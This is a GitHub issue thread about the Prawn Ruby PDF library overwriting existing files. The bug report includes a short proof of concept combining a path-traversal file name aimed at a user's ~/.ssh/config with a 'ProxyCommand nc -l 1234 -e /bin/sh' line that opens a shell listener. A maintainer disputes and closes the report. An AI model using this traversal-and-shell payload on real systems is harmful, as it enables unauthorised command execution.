Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Already on GitHub? Sign in to your account

prawn output allows file overwrite #384

felixgr opened this Issue Aug 10, 2012 · 1 comment


None yet
2 participants

felixgr commented Aug 10, 2012

Prawn does not whether the output file already exists. If the output file is user supplied an attacker can plant and overwrite configuration files.

Prawn::Document.generate "../../../../../../../../../../home/user/.ssh/config" do
  text 'ProxyCommand nc -l 1234 -e /bin/sh'

bradediger commented Aug 12, 2012

I don't think this is a Prawn issue. It's akin to saying that Ruby's File.open contains a bug because it can overwrite arbitrary files that the user has permission to write. Using Prawn with unvalidated user input is a bug in application code, not in Prawn.

Additionally, refusing to overwrite existing files wouldn't fix this issue anyway -- you could do the same amount of damage, say, by creating ~/.profile if it didn't exist.

@bradediger bradediger closed this Aug 12, 2012

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment